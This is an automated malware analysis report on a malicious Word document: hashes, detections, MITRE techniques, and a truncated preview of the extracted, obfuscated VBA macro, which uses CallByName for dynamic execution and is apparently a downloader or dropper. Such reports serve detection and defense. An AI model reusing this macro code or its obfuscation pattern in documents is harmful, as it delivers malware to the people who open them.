Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8004601c08983420…

MALICIOUS

Office (OLE)

96.0 KB Created: 2018-09-24 11:06:00 Authoring application: Microsoft Office Word First seen: 2019-03-18
MD5: 471a89249fadd4bf0c28941ac29b6815 SHA-1: 9e1511d611eb1d11a2d61e232ca4b43220720cba SHA-256: 8004601c08983420408d2784e2a4aa79de426d41a09726a884edcb21f83ee7f8
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, as indicated by multiple high-severity heuristics and ClamAV detection. The VBA code utilizes `GetObject` and `CallByName` functions, suggesting dynamic execution of code. While the exact payload is obfuscated, the presence of macros strongly implies a downloader or dropper functionality, likely intended to deliver a second-stage malicious payload. The `macros.bas` file is identified as the source of these macros.

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-9761059-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-9761059-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28848 bytes
SHA-256: f2f750dd4ba27aa69a61c1a79afd0fe4033550eb29befb4f58018a7d40cc4a48
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "sub1, 0, 0, MSForms, Frame"
Dim dim99, dim59(2) As Byte, dim43(9) As Byte, dim74(32) As Byte, dim62(19) As Byte, dim81(13) As Byte, dim5(5) As Byte, dim04(55) As Byte, dim18(807) As Byte, dim98(5) As Byte, dim86(19) As Byte, dim69(19) As Byte, dim64(1 To 255) As Byte
Private Function dim10(dim00)
On Error GoTo dim75
Dim dim73, dim91
Do
dim91 = dim00(dim73)
dim73 = dim73 + 1
Loop
dim75:
dim10 = dim73 - 1
End Function
Private Function dim07(dim53() As Byte, dim79)
Dim dim85, dim68
On Error GoTo dim72
While dim85 <= dim79
dim68 = dim53(dim85)
If dim68 = 0 Then
Exit Function
End If
dim07 = dim07 & dim71(dim68)
dim68 = 0
dim85 = dim85 + 1
Wend
dim72:
End Function
Private Function dim12(dim8, dim31, dim84, dim65, dim57, dim09)
On Error GoTo dim9
Set dim12 = CallByName(dim8, dim31, dim84, dim57)
dim9:
End Function
Private Sub dim93()
dim18(669) = dim64(226)
dim18(58) = dim64(123)
dim18(629) = dim64(74)
dim18(350) = dim64(95)
dim18(106) = dim64(133)
dim18(631) = dim64(75)
dim18(150) = dim64(121)
dim18(301) = dim64(199)
dim18(185) = dim64(33)
dim18(192) = dim64(162)
dim18(658) = dim64(70)
dim18(769) = dim64(109)
dim18(86) = dim64(59)
dim18(343) = dim64(54)
dim18(677) = dim64(170)
dim18(91) = dim64(189)
dim18(136) = dim64(4)
dim18(386) = dim64(124)
dim18(205) = dim64(253)
dim18(639) = dim64(203)
dim18(241) = dim64(163)
dim18(484) = dim64(81)
dim18(761) = dim64(76)
dim18(506) = dim64(69)
dim18(308) = dim64(189)
dim18(745) = dim64(243)
dim18(480) = dim64(120)
dim18(550) = dim64(237)
dim18(777) = dim64(105)
dim18(507) = dim64(124)
dim18(604) = dim64(219)
dim18(751) = dim64(213)
dim18(644) = dim64(235)
dim18(79) = dim64(216)
dim18(363) = dim64(169)
dim18(533) = dim64(188)
dim18(97) = dim64(238)
dim18(732) = dim64(80)
dim18(534) = dim64(255)
dim18(693) = dim64(128)
dim18(359) = dim64(24)
dim18(23) = dim64(211)
dim18(462) = dim64(189)
dim18(61) = dim64(164)
dim18(730) = dim64(54)
dim18(746) = dim64(196)
dim18(103) = dim64(82)
dim18(680) = dim64(159)
dim18(504) = dim64(1)
dim18(581) = dim64(95)
dim18(221) = dim64(225)
dim18(666) = dim64(224)
dim18(181) = dim64(105)
dim18(133) = dim64(224)
dim18(420) = dim64(249)
dim18(570) = dim64(104)
dim18(40) = dim64(252)
dim18(499) = dim64(27)
dim18(193) = dim64(204)
dim18(370) = dim64(17)
dim18(224) = dim64(7)
dim18(203) = dim64(224)
dim18(202) = dim64(124)
dim18(605) = dim64(128)
dim18(487) = dim64(30)
dim18(653) = dim64(45)
dim18(464) = dim64(134)
dim18(358) = dim64(55)
dim18(380) = dim64(197)
dim18(508) = dim64(21)
dim18(475) = dim64(16)
dim18(696) = dim64(104)
dim18(198) = dim64(221)
dim18(161) = dim64(194)
dim18(602) = dim64(172)
dim18(393) = dim64(225)
dim18(710) = dim64(214)
dim18(590) = dim64(124)
dim18(649) = dim64(167)
dim18(371) = dim64(5)
dim18(729) = dim64(36)
dim18(452) = dim64(30)
dim18(805) = dim64(111)
dim18(449) = dim64(84)
dim18(238) = dim64(52)
dim18(547) = dim64(83)
dim18(170) = dim64(190)
dim18(681) = dim64(38)
dim18(99) = dim64(113)
dim18(672) = dim64(220)
dim18(11) = dim64(24)
dim18(85) = dim64(155)
dim18(735) = dim64(136)
dim18(149) = dim64(200)
dim18(770) = dim64(14)
dim18(351) = dim64(203)
dim18(105) = dim64(145)
dim18(460) = dim64(72)
dim18(575) = dim64(114)
dim18(134) = dim64(71)
dim18(583) = dim64(47)
dim18(611) = dim64(252)
dim18(7) = dim64(62)
dim18(539) = dim64(1)
dim18(614) = dim64(76)
dim18(736) = dim64(60)
dim18(369) = dim64(45)
dim18(73) = dim64(8)
dim18(595) = dim64(158)
dim18(718) = dim64(98)
dim18(94) = dim64(122)
dim18(179) = dim64(189)
dim18(298) = dim64(133)
dim18(527) = dim64(178)
dim18(195) = dim64(103)
dim18(721) = dim64(48)
dim18(470) = dim64(151)
dim18(448) = dim64(65)
dim18(763) = dim64(96)
dim18(768
... (truncated)